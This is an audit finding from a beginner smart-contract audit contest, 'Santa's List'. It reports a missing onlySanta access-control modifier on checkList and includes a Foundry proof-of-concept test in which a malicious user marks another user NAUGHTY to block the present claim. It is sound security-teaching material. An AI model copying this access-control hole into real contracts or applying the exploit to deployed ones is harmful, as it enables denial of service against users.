First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

onlySanta modifier is not set on ```checkList``` function

DeFiesta

Summary

onlySanta modifier is not set on checkList function. Therefore, any user can update s_theListCheckedOnce for any user.

Vulnerability Details

A malicious entity could set every user to NAUGHTY which would cause a DoS since no user would be able to claim its present. Moreover, checkTwice function would always revert.

Impact

The system is susceptible to a Denial of Service (DoS) incident, potentially resulting in users not receiving their Christmas present :'(

Proof of Concept

function testCheckListAttack() public {
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
assertEq(uint256(santasList.getNaughtyOrNiceTwice(user)), uint256(SantasList.Status.NICE));
vm.stopPrank();
vm.startPrank(MaliciousUser);
santasList.checkList(user, SantasList.Status.NAUGHTY);
assertEq(uint256(santasList.getNaughtyOrNiceOnce(user)), uint256(SantasList.Status.NAUGHTY));
vm.stopPrank();
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(user);
vm.expectRevert();
santasList.collectPresent();
vm.stopPrank();
}

Tools Used

Manual review

Recommendations

I recommend putting onlySanta modifier on checkListfunction

Updates

Lead Judging Commences

inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!